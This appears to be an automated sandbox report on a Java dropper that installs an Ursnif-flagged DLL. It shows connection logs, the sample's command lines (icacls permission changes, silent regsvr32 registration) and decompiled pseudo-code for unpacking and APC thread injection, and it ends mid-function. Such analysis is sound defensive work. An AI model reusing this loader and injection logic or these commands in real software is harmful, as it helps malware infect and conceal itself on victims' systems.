May 4, 2021 12:35:12.520936012 CEST	35.181.18.61	443	192.168.2.6	49739	CN=*.112.2o7.net, O=Adobe Systems Incorporated, L=San Jose, ST=California, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Apr 14 02:00:00 CEST 2021 Thu Sep 24 02:00:00 CEST 2020 Fri Nov 10 01:00:00 CET 2006	Thu Apr 21 01:59:59 CEST 2022 Tue Sep 24 01:59:59 CEST 2030 Mon Nov 10 01:00:00 CET 2031	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
					CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030
					CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Nov 10 01:00:00 CET 2006	Mon Nov 10 01:00:00 CET 2031
May 4, 2021 12:35:12.837676048 CEST	34.202.206.65	443	192.168.2.6	49740	CN=*.truste-svc.net, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Sat Apr 25 13:19:21 CEST 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Thu Jun 23 16:37:27 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034
May 4, 2021 12:35:12.838618994 CEST	34.202.206.65	443	192.168.2.6	49741	CN=*.truste-svc.net, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Sat Apr 25 13:19:21 CEST 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Thu Jun 23 16:37:27 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034
May 4, 2021 12:35:12.890716076 CEST	50.87.249.219	443	192.168.2.6	49734	CN=cpcalendars.servicesteam.org CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Mon Apr 26 07:10:28 CEST 2021 Wed Oct 07 21:21:40 CEST 2020	Sun Jul 25 07:10:28 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49188-49192-61-49190-49194-107-106-49162-49172-53-49157-49167-57-56-49187-49191-60-49189-49193-103-64-49161-49171-47-49156-49166-51-50-49196-49195-49200-157-49198-49202-159-163-49199-156-49197-49201-158-162-255,10-11-13-23-0,23-24-25-9-10-11-12-13-14-22,0	d2935c58fe676744fecc8614ee5356c7
May 4, 2021 12:35:12.890716076 CEST	50.87.249.219	443	192.168.2.6	49734	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		d2935c58fe676744fecc8614ee5356c7

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: cmd.exe PID: 6680 Parent PID: 2880

General

Start time:	12:35:01
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ''C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\presentation.jar'' >> C:\cmdlinestart.log 2>&1
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6696 Parent PID: 6680

General

Start time:	12:35:01
Start date:	04/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: java.exe PID: 6732 Parent PID: 6680

General

Start time:	12:35:02
Start date:	04/05/2021
Path:	C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\presentation.jar'
Imagebase:	0xe60000
File size:	192376 bytes
MD5 hash:	28733BA8C383E865338638DF5196E6FE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Java
Reputation:	high

Chronological Activities

Analysis Process: icacls.exe PID: 6808 Parent PID: 6732

General

Start time:	12:35:04
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
Imagebase:	0x320000
File size:	29696 bytes
MD5 hash:	FF0D1D4317A44C951240FAE75075D501
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6820 Parent PID: 6808

General

Start time:	12:35:04
Start date:	04/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6900 Parent PID: 6732

General

Start time:	12:35:06
Start date:	04/05/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' https://www.java.com/
Imagebase:	0x7ff721e20000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6976 Parent PID: 6900

General

Start time:	12:35:07
Start date:	04/05/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6900 CREDAT:17410 /prefetch:2
Imagebase:	0x1130000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 3084 Parent PID: 6732

General

Start time:	12:35:14
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\AppData\Local\broker.dll
Imagebase:	0x3d0000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000008.00000003.526878948.00000000002F0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: regsvr32.exe PID: 3084 Parent PID: 6732 regsvr32.exeCOMMON

Executed Functions

Function 03ED17A7, Relevance: 15.1, APIs: 10, Instructions: 103
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E03ED17A7(intOrPtr _a4) {
				char _v28;
				struct _SYSTEMTIME _v44;
				char _v48;
				long _v52;
				long _v56;
				void* __edi;
				long _t21;
				int _t23;
				long _t26;
				long _t27;
				long _t31;
				intOrPtr _t39;
				intOrPtr _t44;
				signed int _t45;
				void* _t50;
				signed int _t54;
				void* _t56;
				intOrPtr* _t57;

				_t21 = E03ED146C();
				_v52 = _t21;
				if(_t21 != 0) {
					L18:
					return _t21;
				} else {
					goto L1;
				}
				do {
					L1:
					GetSystemTime( &_v44);
					_t23 = SwitchToThread();
					asm("cdq");
					_t45 = 9;
					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
					_t26 = E03ED15A3(0, _t54); // executed
					_v56 = _t26;
					Sleep(_t54 << 5); // executed
					_t21 = _v56;
				} while (_t21 == 0xc);
				if(_t21 != 0) {
					goto L18;
				}
				_t27 = E03ED1C12(_t45);
				_v52 = _t27;
				if(_t27 != 0) {
					L16:
					_t21 = _v52;
					if(_t21 == 0xffffffff) {
						_t21 = GetLastError();
					}
					goto L18;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t56 = E03ED1CA4(E03ED16EC,  &_v28);
					if(_t56 == 0) {
						_v56 = GetLastError();
					} else {
						_t31 = WaitForSingleObject(_t56, 0xffffffff);
						_v56 = _t31;
						if(_t31 == 0) {
							GetExitCodeThread(_t56,  &_v56);
						}
						CloseHandle(_t56);
					}
					goto L16;
				}
				if(E03ED1D7C(_t45,  &_v48) != 0) {
					 *0x3ed41b8 = 0;
					goto L11;
				}
				_t44 = _v48;
				_t57 = __imp__GetLongPathNameW;
				_t50 =  *_t57(_t44, 0, 0);
				if(_t50 == 0) {
					L9:
					 *0x3ed41b8 = _t44;
					goto L11;
				}
				_t15 = _t50 + 2; // 0x2
				_t39 = E03ED1C8F(_t50 + _t15);
				 *0x3ed41b8 = _t39;
				if(_t39 == 0) {
					goto L9;
				} else {
					 *_t57(_t44, _t39, _t50);
					E03ED136A(_t44);
					goto L11;
				}
			}

0x03ed17b3
0x03ed17bc
0x03ed17c0
0x03ed18c8
0x03ed18ce
0x00000000
0x00000000
0x00000000
0x03ed17c6
0x03ed17c6
0x03ed17cb
0x03ed17d1
0x03ed17e0
0x03ed17e1
0x03ed17e4
0x03ed17e7
0x03ed17f0
0x03ed17f4
0x03ed17fa
0x03ed17fe
0x03ed1805
0x00000000
0x00000000
0x03ed180b
0x03ed1812
0x03ed1816
0x03ed18b9
0x03ed18b9
0x03ed18c0
0x03ed18c2
0x03ed18c2
0x00000000
0x03ed18c0
0x03ed181f
0x03ed1872
0x03ed1872
0x03ed1883
0x03ed1887
0x03ed18b5
0x03ed1889
0x03ed188c
0x03ed1894
0x03ed1898
0x03ed18a0
0x03ed18a0
0x03ed18a7
0x03ed18a7
0x00000000
0x03ed1887
0x03ed182d
0x03ed186c
0x00000000
0x03ed186c
0x03ed182f
0x03ed1833
0x03ed183e
0x03ed1842
0x03ed1864
0x03ed1864
0x00000000
0x03ed1864
0x03ed1844
0x03ed1849
0x03ed1850
0x03ed1855
0x00000000
0x03ed1857
0x03ed185a
0x03ed185d
0x00000000
0x03ed185d

APIs

Part of subcall function 03ED146C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,03ED17B8,747863F0,00000000), ref: 03ED147B
Part of subcall function 03ED146C: GetVersion.KERNEL32 ref: 03ED148A
Part of subcall function 03ED146C: GetCurrentProcessId.KERNEL32 ref: 03ED1499
Part of subcall function 03ED146C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 03ED14B2

GetSystemTime.KERNEL32(?,747863F0,00000000), ref: 03ED17CB
SwitchToThread.KERNEL32 ref: 03ED17D1

Part of subcall function 03ED15A3: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 03ED15F9
Part of subcall function 03ED15A3: memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,03ED17EC), ref: 03ED168B
Part of subcall function 03ED15A3: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 03ED16A6

Sleep.KERNELBASE(00000000,00000000), ref: 03ED17F4
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 03ED183C
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 03ED185A
WaitForSingleObject.KERNEL32(00000000,000000FF,03ED16EC,?,00000000), ref: 03ED188C
GetExitCodeThread.KERNEL32(00000000,?), ref: 03ED18A0
CloseHandle.KERNEL32(00000000), ref: 03ED18A7
GetLastError.KERNEL32(03ED16EC,?,00000000), ref: 03ED18AF
GetLastError.KERNEL32 ref: 03ED18C2

Memory Dump Source

Source File: 00000008.00000002.596456288.0000000003ED1000.00000020.00020000.sdmp, Offset: 03ED0000, based on PE: true

Associated: 00000008.00000002.596445184.0000000003ED0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.596471290.0000000003ED3000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.596487361.0000000003ED5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.596497555.0000000003ED6000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
String ID:
API String ID: 2280543912-0
Opcode ID: 4bd957d5fc9abbd5ac7c2d01c52192bf4b9001ec2a44e1e8c6caebca18e2ea05
Instruction ID: 395589c52dfbcad8859eb784b8fad152abf058fc5f9bfa4c61474e41e0975097
Opcode Fuzzy Hash: 4bd957d5fc9abbd5ac7c2d01c52192bf4b9001ec2a44e1e8c6caebca18e2ea05
Instruction Fuzzy Hash: 0531B5799053219BC7A0FF66B844AAFB7FDEF85654B141B2AF491C2184E734C502CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 03F42668, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,000009F8,00003000,00000040,000009F8,03F420C0), ref: 03F42722
VirtualAlloc.KERNEL32(00000000,00000034,00003000,00000040,03F42121), ref: 03F42759
VirtualAlloc.KERNEL32(00000000,0000BFC3,00003000,00000040), ref: 03F427B9
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 03F427EF
VirtualProtect.KERNEL32(03ED0000,00000000,00000004,03F42647), ref: 03F428F4
VirtualProtect.KERNEL32(03ED0000,00001000,00000004,03F42647), ref: 03F4291B
VirtualProtect.KERNEL32(00000000,?,00000002,03F42647), ref: 03F429E8
VirtualProtect.KERNEL32(00000000,?,00000002,03F42647,?), ref: 03F42A3E
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 03F42A5A

Memory Dump Source

Source File: 00000008.00000002.596618254.0000000003F42000.00000040.00020000.sdmp, Offset: 03F42000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 60c54791a7db6562afa80eab81358fde0908a34fd58b877f97c248b394c3acce
Instruction ID: fd03fd1fb175b476bebcdc7ef5fdb7aecfa40f34e1bd74344259038761c8eac8
Opcode Fuzzy Hash: 60c54791a7db6562afa80eab81358fde0908a34fd58b877f97c248b394c3acce
Instruction Fuzzy Hash: 53D13976601202EFDB35CF14C880FA27BB6FF48310B0945B9ED099FA5AD779A850DB64

Uniqueness

Uniqueness Score: -1.00%

Function 03EE0C80, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 1215COMMON

Download Yara Rule

Strings

r, xrefs: 03EE1105

Memory Dump Source

Source File: 00000008.00000002.596525604.0000000003EDF000.00000020.00020000.sdmp, Offset: 03EDF000, based on PE: false

Similarity

API ID:
String ID: r
API String ID: 0-1812594589
Opcode ID: 1d79e26a9fac5fc6f06aa1efbb9025a10063022a1755223cec7349d2d1c5d988
Instruction ID: 8079a026707ea9437900cfbd7d726ef063c7a11b45622e408bee895e58a75af2
Opcode Fuzzy Hash: 1d79e26a9fac5fc6f06aa1efbb9025a10063022a1755223cec7349d2d1c5d988
Instruction Fuzzy Hash: 74B21679904319DFC324EF2DE8A06957BF1ABA8304F088A3EE4498736DD7749989CF51

Uniqueness

Uniqueness Score: -1.00%

Function 03ED1E04, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x3ed4188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x3ed418c;
						if( *0x3ed418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x3ed4198;
								if( *0x3ed4198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x3ed418c);
						}
						HeapDestroy( *0x3ed4190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x3ed4188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x3ed4190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x3ed41b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E03ED1CA4(E03ED1D32, E03ED1EE0(_a12, 1, 0x3ed4198, _t41));
							 *0x3ed418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x03ed1e07
0x03ed1e13
0x03ed1e15
0x03ed1e18
0x03ed1e8e
0x03ed1e94
0x03ed1e96
0x03ed1e98
0x03ed1e9e
0x03ed1ea0
0x03ed1ea5
0x03ed1ea8
0x03ed1eb3
0x03ed1eb5
0x00000000
0x00000000
0x03ed1eb7
0x03ed1eba
0x03ed1ebc
0x00000000
0x00000000
0x00000000
0x03ed1ebc
0x03ed1ec4
0x03ed1ec4
0x03ed1ed0
0x03ed1ed0
0x03ed1e1a
0x03ed1e1b
0x03ed1e3b
0x03ed1e41
0x03ed1e43
0x03ed1e48
0x03ed1e84
0x03ed1e84
0x03ed1e4a
0x03ed1e52
0x03ed1e59
0x03ed1e63
0x03ed1e6f
0x03ed1e76
0x03ed1e7b
0x03ed1e80
0x00000000
0x03ed1e80
0x03ed1e7b
0x03ed1e48
0x03ed1e1b
0x03ed1edd

APIs

InterlockedIncrement.KERNEL32(03ED4188), ref: 03ED1E26
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 03ED1E3B

Part of subcall function 03ED1CA4: CreateThread.KERNEL32 ref: 03ED1CBB
Part of subcall function 03ED1CA4: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 03ED1CD0
Part of subcall function 03ED1CA4: GetLastError.KERNEL32(00000000), ref: 03ED1CDB
Part of subcall function 03ED1CA4: TerminateThread.KERNEL32(00000000,00000000), ref: 03ED1CE5
Part of subcall function 03ED1CA4: CloseHandle.KERNEL32(00000000), ref: 03ED1CEC
Part of subcall function 03ED1CA4: SetLastError.KERNEL32(00000000), ref: 03ED1CF5

InterlockedDecrement.KERNEL32(03ED4188), ref: 03ED1E8E
SleepEx.KERNEL32(00000064,00000001), ref: 03ED1EA8
CloseHandle.KERNEL32 ref: 03ED1EC4
HeapDestroy.KERNEL32 ref: 03ED1ED0

Memory Dump Source

Source File: 00000008.00000002.596456288.0000000003ED1000.00000020.00020000.sdmp, Offset: 03ED0000, based on PE: true

Associated: 00000008.00000002.596445184.0000000003ED0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.596471290.0000000003ED3000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.596487361.0000000003ED5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.596497555.0000000003ED6000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: 79508dee147fa1c2f6906f84e5a787f32d516b2ff05b71df56a9dde1dee4070b
Instruction ID: 39c2ec1c255851b2ec87d4f2d3098a463b4f7a21727523e2647cc8e611cf5168
Opcode Fuzzy Hash: 79508dee147fa1c2f6906f84e5a787f32d516b2ff05b71df56a9dde1dee4070b
Instruction Fuzzy Hash: 1E210234A01215FFCB50EFABFC84A1A7BB8FB682643082329F844D7184EB308D128F50

Uniqueness

Uniqueness Score: -1.00%

Function 03ED1CA4, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03ED1CA4(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x3ed41cc, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x03ed1cbb
0x03ed1cc1
0x03ed1cc5
0x03ed1cd0
0x03ed1cd8
0x03ed1ce1
0x03ed1ce5
0x03ed1cec
0x03ed1cf3
0x03ed1cf5
0x03ed1cfb
0x03ed1cd8
0x03ed1cff

APIs

CreateThread.KERNEL32 ref: 03ED1CBB
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 03ED1CD0
GetLastError.KERNEL32(00000000), ref: 03ED1CDB
TerminateThread.KERNEL32(00000000,00000000), ref: 03ED1CE5
CloseHandle.KERNEL32(00000000), ref: 03ED1CEC
SetLastError.KERNEL32(00000000), ref: 03ED1CF5

Memory Dump Source

Source File: 00000008.00000002.596456288.0000000003ED1000.00000020.00020000.sdmp, Offset: 03ED0000, based on PE: true

Associated: 00000008.00000002.596445184.0000000003ED0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.596471290.0000000003ED3000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.596487361.0000000003ED5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.596497555.0000000003ED6000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 8cad75e4c520100bd7c018f39b090eb0fff3f2ac955deb480c1ea96f49e588ad
Instruction ID: aa0d3f94f5575fdf1c6bffd969e2649a504c598fa7f58237e4eed0f626ff005e
Opcode Fuzzy Hash: 8cad75e4c520100bd7c018f39b090eb0fff3f2ac955deb480c1ea96f49e588ad
Instruction Fuzzy Hash: 1FF0123A207631BBD7217BA2BC0CF5FBF69FB08751F044714F68591158C73188219BA6

Uniqueness

Uniqueness Score: -1.00%

Function 03EE0100, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 192COMMON

Download Yara Rule

APIs

VirtualProtectEx.KERNELBASE(000000FF,04049DDC,0000304B,00000040,?), ref: 03EE01DD

Strings

K0, xrefs: 03EE023C, 03EE02A7, 03EE03A3, 03EE03B7, 03EE03D9, 03EE03E8, 03EE01F0, 03EE020F, 03EE0217
K0, xrefs: 03EE03C1, 03EE02D4, 03EE02FB, 03EE0316
K0, xrefs: 03EE0114
K0, xrefs: 03EE0293

Memory Dump Source

Source File: 00000008.00000002.596525604.0000000003EDF000.00000020.00020000.sdmp, Offset: 03EDF000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID: K0$ K0$ K0$K0
API String ID: 544645111-2055335449
Opcode ID: e8bd3045cbb6acad0d6882551f861da138572cb2547d2fefb67a574eb242f925
Instruction ID: 17841392a3dd948339f2ce26ca6c944c3fd9c75edb7fc38ea25677c8ddddc9bd
Opcode Fuzzy Hash: e8bd3045cbb6acad0d6882551f861da138572cb2547d2fefb67a574eb242f925
Instruction Fuzzy Hash: 99913979900118EBD718EF6DF4A0A69BBF2BB68304B04CA39E4599336DD7346944CF54

Uniqueness

Uniqueness Score: -1.00%

Function 03ED15A3, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E03ED15A3(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x3ed41b0;
				_t39 = E03ED1A4B(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x3ed41cc;
